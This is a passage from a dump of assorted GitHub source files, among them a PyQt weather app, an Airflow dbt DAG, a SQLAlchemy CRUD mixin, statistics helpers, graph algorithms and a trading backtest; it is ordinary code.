})\n","repo_name":"ExpectationMax/torch_persistent_homology","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"74910492601","text":"from PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QPushButton, QLabel, QMessageBox, QRadioButton, QLineEdit, QCheckBox\n\nimport MainWindow as main\nimport geocoder\n\nclass ChangeCityWindow(QtWidgets.QDialog):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.setWindowTitle('Change The City — Weathr')\n self.top = 200\n self.left = 350\n self.width = 400\n self.height = 400\n self.cityName = ''\n\n self.InitUI()\n self.setWindowIcon(QIcon('Images/weather.ico'))\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n\n def InitUI(self):\n\n #create a styled header\n self.header = QLabel(self)\n self.header.setText('
Change the City')\n        self.header.move(130, 10)\n\n        #create the form and the explanation label\n        self.cityLabel = QLabel(self)\n        self.cityLabel.setText('Change the City:')\n        self.cityLabel.move(15, 30)\n\n        #create input field\n        self.cityInputField = QLineEdit(self)\n        self.cityInputField.resize(180, 32)\n        self.cityInputField.move(15, 55)\n        self.cityInputField.setPlaceholderText('Enter a City...')\n\n        #create header for settings\n        self.headerSettings = QLabel(self)\n        self.headerSettings.setText('Location Settings')\n        self.headerSettings.move(15, 100)\n\n        #create settings for the location settings\n        self.locationLabel = QLabel(self)\n        self.locationLabel.setText('NOTE: Location tracking is dependent on the internet and the IP. Note that the IP might not contain an accurate location. Also, if this is checked, whatever you put into the text field above will be ignored.')\n        self.locationLabel.setWordWrap(True)\n        self.locationLabel.move(15, 130)\n\n        self.turnOnLocationTracking = QCheckBox(self)\n        self.turnOnLocationTracking.setText('Track location instead')\n        self.turnOnLocationTracking.move(15, 220)\n        self.turnOnLocationTracking.stateChanged.connect(self.getLocation)\n        self.turnOnLocationTracking.stateChanged.connect(self.cityInputField.setDisabled)\n\n        self.coordinatesLabel = QLabel(self)\n        self.coordinatesLabel.move(15, 245)\n        self.coordinatesLabel.setText('Your Location will Be Displayed Here')\n        self.coordinatesLabel.resize(600, 30)\n\n        #create the save btn\n        self.saveBtn = QPushButton(self)\n        self.saveBtn.setText('Save Preferences')\n        self.saveBtn.move(15, 360)\n        self.saveBtn.clicked.connect(self.saveFunction)\n\n        #create the cancel Btn\n        self.cancelBtn = QPushButton(self)\n        self.cancelBtn.setText('Cancel')\n        self.cancelBtn.move(300, 360)\n        self.cancelBtn.clicked.connect(self.cancel)\n\n\n    def getLocation(self):\n\n        self.g = geocoder.ip('me')\n        print(self.g.latlng)\n        self.coordinatesLabel.setText('Your Location Is In ' +str(self.g.state)+ ', ' +str(self.g.city)+ '
')\n\n\n def saveFunction(self):\n\n #self.reloadWeather()\n #self.close()\n\n #check \"weather\" or not (hahaha get it? weather?) the location button is checked\n if self.turnOnLocationTracking.isChecked():\n\n #write to the text file\n with open('src/saves/startupcity.txt', 'w') as f:\n f.write(self.g.city)\n\n self.reloadWeather()\n self.close()\n \n #run if location tracking isn't checked.\n elif self.turnOnLocationTracking.isChecked() != True:\n\n if self.cityInputField.text() == '' or self.cityInputField.text() == ' ':\n self.dlg = QMessageBox.critical(self, 'Blank Form', 'Fill in the form. The form cannont be blank',\n QMessageBox.Ok)\n self.cancelBtn.setDisabled(True)\n self.mainGetWeather.close()\n self.show()\n\n else:\n #write to text file\n # write to the text file\n with open('src/saves/startupcity.txt', 'w') as f:\n f.write(self.cityInputField.text())\n\n self.reloadWeather()\n self.close()\n def reloadWeather(self):\n\n self.mainGetWeather = main.Window()\n self.mainGetWeather.getWeather()\n self.close()\n\n def cancel(self):\n self.mainGetWeather = main.Window()\n self.close()\n self.mainGetWeather.show()","repo_name":"henrybungee/weathr-forecast","sub_path":"src/ChangeCityWindow.py","file_name":"ChangeCityWindow.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7125213830","text":"from pendulum import datetime\nfrom airflow.decorators import dag\nfrom airflow.operators.bash import BashOperator\n\nPATH_TO_DBT_PROJECT = \"\"\nPATH_TO_DBT_VENV = \"\"\n\n\n@dag(\n start_date=datetime(2023, 3, 23),\n schedule=\"@daily\",\n catchup=False,\n)\ndef simple_dbt_dag():\n dbt_run = BashOperator(\n task_id=\"dbt_run\",\n bash_command=\"source $PATH_TO_DBT_VENV && dbt run --models .\",\n env={\"PATH_TO_DBT_VENV\": PATH_TO_DBT_VENV},\n cwd=PATH_TO_DBT_PROJECT,\n )\n\n\nsimple_dbt_dag()\n","repo_name":"astronomer/docs","sub_path":"code-samples/dags/airflow-dbt/airflow_dbt_bashoperator.py","file_name":"airflow_dbt_bashoperator.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"416049704","text":"# -*- coding: utf-8 -*-\nfrom conans import ConanFile\nfrom conans import CMake\n\nclass ConanRecipe(ConanFile):\n python_requires = 'common/1.0.0@mevislab/stable'\n python_requires_extend = 'common.CommonRecipe'\n\n _cmake = None\n\n def _configure_cmake(self):\n if not self._cmake:\n self.create_cmake_wrapper()\n self._cmake = CMake(self)\n self._cmake.definitions[\"CMAKE_DEBUG_POSTFIX\"] = \"d\"\n self._cmake.definitions[\"BUILD_SHARED_LIBS\"] = True\n\n self._cmake.configure()\n\n return self._cmake\n\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n\n self.copy(\"*.pdb\", src=\"bin\", dst=\"bin\")\n\n self.patch_binaries()\n self.default_package()\n","repo_name":"MeVisLab/mevislabthirdparty","sub_path":"recipes/fme/spline/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"33677679283","text":"\"\"\"pypyr step that writes payload out to a yaml file.\"\"\"\nimport os\nimport logging\nimport pypyr.yaml\n\n# logger means the log level will be set correctly\nlogger = logging.getLogger(__name__)\n\n\ndef run_step(context):\n \"\"\"Write payload out to yaml 
file.\n\n Args:\n context: pypyr.context.Context. Mandatory.\n The following context keys expected:\n - fileWriteYaml\n - path. mandatory. path-like. Write output file to\n here. Will create directories in path for you.\n - payload. optional. Write this to output file. If not\n specified, output entire context.\n\n Returns:\n None.\n\n Raises:\n pypyr.errors.KeyNotInContextError: fileWriteYaml or\n fileWriteYaml['path'] missing in context.\n pypyr.errors.KeyInContextHasNoValueError: fileWriteYaml or\n fileWriteYaml['path'] exists but is None.\n\n \"\"\"\n logger.debug(\"started\")\n context.assert_child_key_has_value('fileWriteYaml', 'path', __name__)\n\n out_path = context.get_formatted_string(context['fileWriteYaml']['path'])\n # doing it like this to safeguard against accidentally dumping all context\n # with potentially sensitive values in it to disk if payload exists but is\n # None.\n is_payload_specified = 'payload' in context['fileWriteYaml']\n\n yaml_writer = pypyr.yaml.get_yaml_parser_roundtrip_for_context()\n\n logger.debug(\"opening destination file for writing: %s\", out_path)\n os.makedirs(os.path.abspath(os.path.dirname(out_path)), exist_ok=True)\n with open(out_path, 'w') as outfile:\n if is_payload_specified:\n payload = context['fileWriteYaml']['payload']\n formatted_iterable = context.get_formatted_iterable(payload)\n else:\n formatted_iterable = context.get_formatted_iterable(context)\n\n yaml_writer.dump(formatted_iterable, outfile)\n\n logger.info(\"formatted context content and wrote to %s\", out_path)\n logger.debug(\"done\")\n","repo_name":"pombredanne/pypyr-cli","sub_path":"pypyr/steps/filewriteyaml.py","file_name":"filewriteyaml.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"32074285797","text":"from sys import stdin\r\ndef arePermutation(str1, str2):\r\n n1 = len(str1) \r\n n2 = len(str2)\r\n if (n1 != n2):\r\n return False\r\n \r\n freq = [0]*256\r\n \r\n for i in range(n1):\r\n ch = ord(str1[i])\r\n freq[ch] += 1\r\n \r\n for i in range(n2):\r\n ch = ord(str2[i])\r\n freq[ch] -= 1\r\n \r\n for i in range(256):\r\n if freq[i] != 0:\r\n return False\r\n return True\r\n \r\n \r\n \r\n \r\nstr1 = stdin.readline().strip()\r\nstr2 = stdin.readline().strip()\r\nans = arePermutation(str1, str2)\r\nif ans:\r\n print(\"true\") \r\nelse: \r\n print(\"false\") ","repo_name":"haspdecrypted/Coding-Ninjas-Intro-to-Python---DSA","sub_path":"strings/check permutation.py","file_name":"check permutation.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27314325569","text":"# Ford-Fulkerson algorith in Python\r\n\r\nfrom collections import defaultdict\r\n\r\nimport sys\r\n\r\nclass Person:\r\n \"\"\"\r\n Represent a generic person\r\n \"\"\"\r\n\r\n def __init__(self, name, priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n self.name = name\r\n self.priorities = priorities\r\n self.partner = None\r\n self.rank = None\r\n\r\n def __repr__(self):\r\n return 'Name is ' + self.name + '\\n' + \\\r\n 'Partner is currently ' + str(self.partner) + str(self.rank) + '\\n' + \\\r\n 'priority list is ' + str(self.priorities)\r\n\r\n\r\nclass Man(Person):\r\n \"\"\"\r\n Represents a man\r\n \"\"\"\r\n\r\n def __init__(self, name, 
priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n Person.__init__(self, name, priorities)\r\n self.proposalIndex = 0 # next person in our list to whom we might propose\r\n\r\n def nextProposal(self):\r\n if self.proposalIndex >= len(self.priorities):\r\n print ('returned None')\r\n return None\r\n goal = self.priorities[self.proposalIndex]\r\n self.proposalIndex += 1\r\n return goal\r\n\r\n def __repr__(self):\r\n return Person.__repr__(self) + '\\n' + \\\r\n 'next proposal would be to person a position ' + str(self.proposalIndex)\r\n\r\n\r\nclass Woman(Person):\r\n \"\"\"\r\n Represents a woman\r\n \"\"\"\r\n\r\n def __init__(self, name, priorities):\r\n \"\"\"\r\n name is a string which uniquely identifies this person\r\n\r\n priorities is a list of strings which specifies a ranking of all\r\n potential partners, from best to worst\r\n \"\"\"\r\n Person.__init__(self, name, priorities)\r\n\r\n # now compute a reverse lookup for efficient candidate rating\r\n self.ranking = {}\r\n for rank in range(len(priorities)):\r\n self.ranking[priorities[rank]] = rank\r\n\r\n def evaluateProposal(self, suitor):\r\n \"\"\"\r\n Evaluates a proposal, though does not enact it.\r\n\r\n suitor is the string identifier for the man who is proposing\r\n\r\n returns True if proposal should be accepted, False otherwise\r\n \"\"\"\r\n if suitor in self.ranking:\r\n if self.partner == None or self.ranking[suitor] < self.ranking[self.partner]:\r\n self.rank = self.ranking[suitor]+1\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n\r\ndef parseFile(filename):\r\n \"\"\"\r\n Returns a list of (name,priority) pairs.\r\n \"\"\"\r\n people = []\r\n #f = file(filename)\r\n with open(filename) as f:\r\n for line in f:\r\n pieces = line.split(':')\r\n name = pieces[0].strip()\r\n if name:\r\n priorities = pieces[1].strip().split(',')\r\n for i in range(len(priorities)):\r\n priorities[i] = priorities[i].strip()\r\n people.append((name, priorities))\r\n f.close()\r\n return people\r\n\r\n\r\ndef printPairings(men,women):\r\n #print(women)\r\n for man in men.values():\r\n #print(man)\r\n print(man.name, 'is paired with', str(man.partner),end='')\r\n if man.partner:\r\n print(' rank ', man.rank, ' rank :',women[str(man.partner)].rank )\r\n else:\r\n print()\r\n\r\n\r\nclass Graph:\r\n def __init__(self, graph):\r\n self.graph = graph\r\n self. 
ROW = len(graph)\r\n\r\n\r\n # Using BFS as a searching algorithm\r\n def searching_algo_BFS(self, s, t, parent):\r\n\r\n visited = [False] * (self.ROW)\r\n queue = []\r\n\r\n queue.append(s)\r\n visited[s] = True\r\n\r\n while queue:\r\n\r\n u = queue.pop(0)\r\n\r\n for ind, val in enumerate(self.graph[u]):\r\n if visited[ind] == False and val > 0:\r\n queue.append(ind)\r\n visited[ind] = True\r\n parent[ind] = u\r\n\r\n return True if visited[t] else False\r\n\r\n # Applying fordfulkerson algorithm\r\n def ford_fulkerson(self, source, sink):\r\n parent = [-1] * (self.ROW)\r\n max_flow = 0\r\n\r\n while self.searching_algo_BFS(source, sink, parent):\r\n\r\n path_flow = float(\"Inf\")\r\n s = sink\r\n while(s != source):\r\n path_flow = min(path_flow, self.graph[parent[s]][s])\r\n s = parent[s]\r\n\r\n print(path_flow)\r\n print(self.graph[parent[s]])\r\n # Adding the path flows\r\n max_flow += path_flow\r\n\r\n # Updating the residual values of edges\r\n v = sink\r\n while(v != source):\r\n u = parent[v]\r\n self.graph[u][v] -= path_flow\r\n self.graph[v][u] += path_flow\r\n v = parent[v]\r\n\r\n return max_flow\r\n\r\n\r\ngraph = [[0, 8, 0, 0, 3, 0],\r\n [0, 0, 9, 0, 0, 0],\r\n [0, 0, 0, 0, 7, 2],\r\n [0, 0, 0, 0, 0, 5],\r\n [0, 0, 7, 4, 0, 0],\r\n [0, 0, 0, 0, 0, 0]]\r\n\r\ng = Graph(graph)\r\n\r\nsource = 0\r\nsink = 5\r\n\r\nprint(\"Max Flow: %d \" % g.ford_fulkerson(source, sink))\r\n\r\nif __name__ == \"__main__\":\r\n # initialize dictionary of men\r\n menlist = parseFile(sys.argv[1])\r\n men = dict()\r\n for person in menlist:\r\n men[person[0]] = Man(person[0], person[1])\r\n unwedMen = list(men.keys())\r\n\r\n # initialize dictionary of women\r\n womenlist = parseFile(sys.argv[2])\r\n women = dict()\r\n for person in womenlist:\r\n women[person[0]] = Woman(person[0], person[1])\r\n\r\n\r\n # we should be done\r\n print(\"Final Pairings are as follows:\")\r\n printPairings(men,women)","repo_name":"MaxThomas198/Multi-Agent-Systems","sub_path":"TestsForP2/testss.py","file_name":"testss.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4426089200","text":"import chatgpt_wrapper.core.util as util\nfrom chatgpt_wrapper.backends.browser.chatgpt import AsyncChatGPT\nfrom chatgpt_wrapper.core.repl import Repl\n\nclass BrowserRepl(Repl):\n \"\"\"\n A shell interpreter that serves as a front end to the ChatGPT class\n \"\"\"\n\n def configure_shell_commands(self):\n self.commands = util.introspect_commands(__class__)\n\n async def configure_backend(self):\n self.backend = AsyncChatGPT(self.config)\n\n async def launch_backend(self, interactive=True):\n await self.backend.create(timeout=90)\n\n async def do_session(self, _):\n \"\"\"\n Refresh session information\n\n This can resolve errors under certain scenarios.\n\n Examples:\n {COMMAND}\n \"\"\"\n await self.backend.refresh_session()\n usable = (\n \"The session appears to be usable.\"\n if \"accessToken\" in self.backend.session\n else \"The session is not usable. Try `install` mode.\"\n )\n util.print_markdown(f\"* Session information refreshed. 
{usable}\")\n\n async def cleanup(self):\n await self.backend.cleanup()\n","repo_name":"1ultimat3/chatgpt-wrapper","sub_path":"chatgpt_wrapper/backends/browser/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"40328943535","text":"import os, sys, re\nfrom crop import crop\n\n# Create the directories in the target path to contain the cropped pages and bound pdf\ndef makeDirs(root):\n os.system(\"mkdir -p \" + os.path.join(root, \"cropped\"))\n os.system(\"mkdir -p \" + os.path.join(root, \"bound\"))\n\n# Return a list of filenames (not full pathnames) of the raw files to\n# process in the target path\ndef findImages(root):\n result = []\n valid = re.compile('^[0-9]+.[jJ][pP][eE]?[gG]$')\n all = os.listdir(root)\n for filename in all:\n path = os.path.join(root, filename)\n if (os.path.isfile(path) and\n valid.match(filename)):\n result.append(filename)\n return result\n\n# Crop each file in the target path\ndef cropAll(root):\n imageList = findImages(root)\n for image in imageList:\n imageOut = re.sub(r'(.[jJ][pP][eE]?[gG])$', '.jpg', image)\n crop(os.path.join(root, image), os.path.join(root, \"cropped\", imageOut))\n\n# Bind cropped files into a PDF\ndef bindAll(root):\n os.system(\"img2pdf -o \" + os.path.join(root, \"bound/book.pdf\") + \" \" + os.path.join(root, \"cropped/*.jpg\"))\n \ndef main():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: bind.py \\n\")\n exit(1)\n root = sys.argv[1]\n makeDirs(root)\n cropAll(root)\n bindAll(root)\n\nmain()\n","repo_name":"Tenrec-Builders/marker-crop","sub_path":"src/bind.py","file_name":"bind.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"26919670140","text":"import matplotlib.pyplot as plt\n# per manipolare arrays e fare di conto\nimport numpy as np\nfrom math import log10, floor, sqrt\n# per fare cose piu' sofisticate come per esempio generare \n#numeri pseudo random\nimport scipy as sp\nfrom scipy import stats\n\n\n#########################################################################\n# funzione per arrotondare con un certo numero di cifre significative\n#########################################################################\ndef round_sig(x, sig=2):\n return round(x, sig-int(floor(log10(abs(x))))-1)\n########################################################################\ndef y_inc(xl, sigma_m, sigma_c, cov_mc):\n return np.sqrt(np.power(xl, 2)*np.power(sigma_m, 2) +\n np.power(sigma_c, 2) +\n 2*xl*cov_mc) \n#########################################################################\n# funzione per fare un istogramma con una gaussiana sovrapposta\n#########################################################################\n#\ndef gaussHistogram(d, xl='x', yl='y', titolo='titolo', bin_scale=0.5):\n mean = d.mean()\n std = d.std()\n\n# scelta del binning\n binsize = std*bin_scale # metà della standard deviation di default\n interval = d.max() - d.min()\n nbins = int(interval / binsize)\n \n# 1) Crea un numpy array con 100 valori equamente separati nell'intervallo voluto dell'asse x\n lnspc = np.linspace(d.min()-std, d.max()+std, 100) \n\n# in questo modo posso raccogliere in vettori le informazioni sull'istogramma\n counts , bins , patches = plt.hist(d, bins=nbins,\n color=\"blue\", alpha=0.75)\n \n plt.xlabel(xl)\n plt.ylabel(yl)\n plt.title(label=titolo)\n# ==> Disegna una distribuzione normale\n\n# 2) 
+{"seq_id":"26919670140","text":"import matplotlib.pyplot as plt\n# for manipulating arrays and doing the math\nimport numpy as np\nfrom math import log10, floor, sqrt\n# for more sophisticated things, e.g. generating\n# pseudo-random numbers\nimport scipy as sp\nfrom scipy import stats\n\n\n#########################################################################\n# function to round to a given number of significant figures\n#########################################################################\ndef round_sig(x, sig=2):\n return round(x, sig-int(floor(log10(abs(x))))-1)\n########################################################################\ndef y_inc(xl, sigma_m, sigma_c, cov_mc):\n return np.sqrt(np.power(xl, 2)*np.power(sigma_m, 2) +\n np.power(sigma_c, 2) +\n 2*xl*cov_mc) \n#########################################################################\n# function to draw a histogram with a Gaussian overlaid\n#########################################################################\n#\ndef gaussHistogram(d, xl='x', yl='y', titolo='titolo', bin_scale=0.5):\n mean = d.mean()\n std = d.std()\n\n# choice of the binning\n binsize = std*bin_scale # half of the standard deviation by default\n interval = d.max() - d.min()\n nbins = int(interval / binsize)\n \n# 1) Create a numpy array with 100 evenly spaced values over the desired x-axis interval\n lnspc = np.linspace(d.min()-std, d.max()+std, 100) \n\n# this way the histogram information is collected into vectors\n counts , bins , patches = plt.hist(d, bins=nbins,\n color=\"blue\", alpha=0.75)\n \n plt.xlabel(xl)\n plt.ylabel(yl)\n plt.title(label=titolo)\n# ==> Draw a normal distribution\n\n# 2) Normalize the function f(x) so that its integral from -inf to +inf equals the total number of measurements\n norm_factor = d.size * binsize\n\n# 3) Create a numpy array with the f(x) values, one per point\n# NOTE: I used the normal distribution taken from \"scipy\"\n# (see \"from scipy import stats\" at the top of the program)\n f_gaus = norm_factor*stats.norm.pdf(lnspc, mean, std) \n# draw the function\n plt.plot(lnspc, f_gaus, linewidth=1, color='r',linestyle='--')\n print('counts = ', len(d))\n print('mean = ', mean)\n print('sigma = ', std)\n print('sigma_mean = ', std/sqrt(len(d)))\n\n#########################################################################\n# function to perform the linear fit\n#########################################################################\n#\n# function for the expectation value weighted by 1/$\\sigma_i^2$\ndef my_mean(x, w):\n return np.sum( x*np.power(w, -2) ) / np.sum( np.power(w, -2) )\n\ndef my_mean_sigma(w):\n return np.sqrt(1/np.sum(np.power(w,-2)))\n\ndef my_cov(x, y, w):\n return my_mean(x*y, w) - my_mean(x, w)*my_mean(y, w)\n\ndef my_var(x, w):\n return my_cov(x, x, w)\n\n# linear relation \ndef my_line(x, m=1, c=0):\n return x*m +c\n\n# function computing m, c, sd_m, sd_c, cov_mc from\n# x, y, sd_y\ndef lin_fit(x, y, sd_y, verbose=True, plot=False):\n m = my_cov(x, y, sd_y) / my_var(x, sd_y)\n var_m = 1 / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2)) )\n c = my_mean(y, sd_y) - my_mean(x, sd_y) * m # weighted means, consistent with var_c and cov_mc below\n var_c = my_mean(x*x, sd_y) / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2)))\n cov_mc = - my_mean(x, sd_y) / ( my_var(x, sd_y) * np.sum( np.power(sd_y, -2))) \n if (verbose):\n print ('m = ', m)\n print ('sigma(m) = ', np.sqrt(var_m))\n print ('c = ', c)\n print ('sigma(c) = ', np.sqrt(var_c))\n print ('cov(m, c) = ', cov_mc)\n \n if (plot):\n # plot the measured points\n plt.errorbar(x, y, yerr=sd_y, xerr=0, ls='', marker='.', \n label='measured points')\n\n # build x points at which to evaluate the regression line\n xmin = np.min(x)\n xmax = np.max(x)\n xl = np.linspace(0.8*xmin-.2*(xmax-xmin), xmax*1.2+.2*(xmax-xmin), 100)\n # use the mean parameters m and c\n yl = my_line(xl, m, c)\n # plot the regression line\n plt.plot(xl, yl, 'g-.', label='regression line')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.title('Linear regression')\n a=plt.legend()\n return m, np.sqrt(var_m), c, np.sqrt(var_c), cov_mc\n \n# Fit plot\ndef fit_graph(x,y,sy,m,sm,c,sc,co, grid=True, err=True):\n xmin = np.amin(x)\n xmax = np.amax(x)\n # plot the measured points\n plt.errorbar(x, y, yerr=sy, xerr=0, ls='', marker='.', label='measured points')\n\n # build x points at which to evaluate the regression line\n xl = np.linspace(xmin, xmax, 100)\n # use the mean parameters m and c\n yl = my_line(xl, m,c)\n # plot the regression line\n plt.plot(xl, yl, 'g-.', label='regression line')# propagate the uncertainty on y from m and c\n # uncertainty on the y values\n yinc = y_inc(xl, sm, sc, co)\n if (err): \n # curves at y +- uncertainty\n plt.plot(xl, yl+yinc, 'r--', label='uncertainty band $\\pm \\sigma_{m}$')\n plt.plot(xl, yl-yinc, 'r--') \n if (grid):\n plt.grid(b=None, which='major', axis='both')\n plt.legend()\n","repo_name":"Kevin222-hub/Lab_reports","sub_path":"Elettro_1/my_lib.py","file_name":"my_lib.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34757762547","text":"from __future__ import annotations\n\nfrom typing import 
TYPE_CHECKING, Optional, Any, Iterable\n\nfrom sqlalchemy import exists\nfrom sqlalchemy.exc import NoResultFound\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom .inspection import InspectionMixin\nfrom .utils import classproperty\n\nif TYPE_CHECKING:\n from db.model import Model\n\n\nclass CRUDMixin(InspectionMixin):\n __abstract__ = True\n\n @classproperty\n def settable_attributes(cls) -> list[str]:\n return cls.columns + cls.hybrid_properties + cls.settable_relations\n\n def fill(self, **fields: str) -> Model:\n for name in fields.keys():\n if name in self.settable_attributes:\n setattr(self, name, fields[name])\n else:\n raise KeyError(\"Attribute '{}' doesn't exist\".format(name))\n\n return self\n\n async def save(\n self,\n session: AsyncSession,\n flush: bool = True,\n refresh: bool = False\n ) -> Model:\n session.add(self)\n if flush:\n await session.flush()\n if refresh:\n await session.refresh(self)\n return self\n\n @classmethod\n async def create(\n cls,\n session: AsyncSession,\n **fields: str\n ) -> Model:\n return await cls().fill(**fields).save(session)\n\n @classmethod\n async def bulk_create(\n cls,\n session: AsyncSession,\n objects: Iterable[Model]\n ):\n \"\"\"Add and create the given collection of instances.\"\"\"\n session.add_all(objects)\n await session.flush()\n\n\n async def update(\n self,\n session: AsyncSession,\n **fields: str\n ) -> Model:\n self.fill(**fields)\n return await self.save(session)\n\n @classmethod\n async def get_or_create(\n cls,\n session: Optional[AsyncSession] = None,\n defaults: Optional[dict] = None,\n **kwargs: Any,\n ) -> tuple[Model, bool]:\n \"\"\"\n Fetches the object if exists (filtering on the provided parameters),\n else creates an instance with any unspecified parameters as default values.\n \"\"\"\n if defaults is None:\n defaults = {}\n try:\n instance = await cls.where(**kwargs).one(session)\n return instance, False\n except NoResultFound:\n kwargs |= defaults or {}\n return await cls.create(session, **kwargs), True\n\n @classmethod\n async def update_or_create(\n cls,\n session: Optional[AsyncSession] = None,\n defaults: Optional[dict] = None,\n **kwargs: Any,\n ) -> tuple[Model, bool]:\n \"\"\"\n A convenience method for updating an object with the given\n kwargs, creating a new one if necessary.\n \"\"\"\n if defaults is None:\n defaults = {}\n try:\n instance = await cls.where(**kwargs).one(session)\n except NoResultFound:\n kwargs |= defaults or {}\n return await cls.create(session, **kwargs), True\n else:\n await instance.update(session, **defaults)\n return instance, False\n\n @classmethod\n async def find(\n cls,\n session: Optional[AsyncSession],\n id: int,\n ) -> Model:\n \"\"\"\n Find record by id.\n\n Args:\n id_ (int): Primary key\n\n Raises: NoResultFound\n \"\"\"\n instance = await session.get(cls, id)\n if not instance:\n raise NoResultFound\n return instance\n\n @classmethod\n async def find_or_none(\n cls,\n session: Optional[AsyncSession],\n id: int,\n ) -> Model:\n \"\"\"\n Find record by id.\n\n Args:\n id_ (int): Primary key\n \"\"\"\n return await session.get(cls, id)\n\n @classmethod\n async def exists(\n cls,\n session: AsyncSession,\n **fields: str\n ) -> bool:\n \"\"\"\n Syntactic sugar for exists.\n\n Can be used as an alternative of following:\n\n is_exist = await exists(\n select(Account).filter_by(**fields)\n ).select().scalar(db)\n\n Example:\n\n is_exist = await Account \\\n .exists(db, email=\"jondoe@gmail.com\")\n\n \"\"\"\n return await 
exists(cls.where(**fields)).select().scalar(session)\n","repo_name":"mkbeh/fastapi-admin-panel","sub_path":"backend/app/db/mixins/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"37123832900","text":"import pandas as pd\n\nimport ezyquant as ez\nfrom ezyquant import utils as ezutils\nfrom ezyquant.backtesting import Context\nfrom ezyquant.reader import SETBusinessDay\n\nnan = float(\"nan\")\n\n# Connect Database\nez.connect_sqlite(\"ezyquant.db\")\n\n# Prepare Data\nstart_date = \"2020-01-01\"\nstart_load_date = ezutils.date_to_str(\n pd.Timestamp(start_date) - SETBusinessDay(14)\n) # load more data for signal calculation\nend_date = \"2022-12-31\"\nssc = ez.SETSignalCreator(\n start_date=start_date,\n index_list=[\"SET50\"],\n)\n\n# Generate Signal\ndf_high = ssc.get_data(\"high\", \"daily\")\ndf_low = ssc.get_data(\"low\", \"daily\")\ndf_close = ssc.get_data(\"close\", \"daily\")\n\nsignal_df = ssc.ta.rsi_divergence(high=df_high, low=df_low, close=df_close)\n\n\n# Backtest Algorithm\ndef backtest_algorithm(c: Context):\n # Buy signal\n if c.signal > 0:\n return c.target_pct_port(0.1)\n # Take profit\n if 1.1 * c.cost_price < c.close_price:\n return c.target_pct_port(0)\n # Stop loss\n if c.close_price < 0.95 * c.cost_price:\n return c.target_pct_port(0)\n\n return 0\n\n\n# Backtest\nresult = ez.backtest(\n signal_df=signal_df,\n backtest_algorithm=backtest_algorithm,\n start_date=start_date,\n end_date=end_date,\n initial_cash=1e6,\n pct_commission=0.25,\n pct_buy_slip=0.0,\n pct_sell_slip=0.0,\n price_match_mode=\"weighted\",\n signal_delay_bar=1,\n)\n\n# Show Result\nprint(result.stat_df)\n","repo_name":"ezyquant/ezyquant","sub_path":"examples/model_rsi_divergence.py","file_name":"model_rsi_divergence.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"22168643248","text":"import sys\r\n\r\nclass UFDS:\r\n def __init__(self, N):\r\n self.p = [i for i in range(N)]\r\n self.rank = [0 for _ in range(N)]\r\n self.size = [1 for _ in range(N)]\r\n\r\n def find_set(self, i):\r\n if self.p[i] == i: return i\r\n self.p[i] = self.find_set(self.p[i])\r\n return self.p[i]\r\n\r\n def union(self, i, j):\r\n x, y = self.find_set(i), self.find_set(j)\r\n if x != y:\r\n if self.rank[x] > self.rank[y]:\r\n self.p[y] = x\r\n self.size[x] += self.size[y]\r\n else:\r\n self.p[x] = y\r\n self.size[y] += self.size[x]\r\n if self.rank[x] == self.rank[y]:\r\n self.rank[y] += 1\r\n\r\nn, q = map(int, input().split())\r\nufds = UFDS(n)\r\nfor line in sys.stdin:\r\n c = line.split()\r\n if len(c) == 2:\r\n print(ufds.size[ufds.find_set(int(c[-1]) - 1)])\r\n else:\r\n ufds.union(int(c[1]) - 1, int(c[2]) - 1)","repo_name":"RussellDash332/kattis","sub_path":"src/Tildes/tildes.py","file_name":"tildes.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"41189740910","text":"from javascript import require\n\n\nclass Flatline:\n 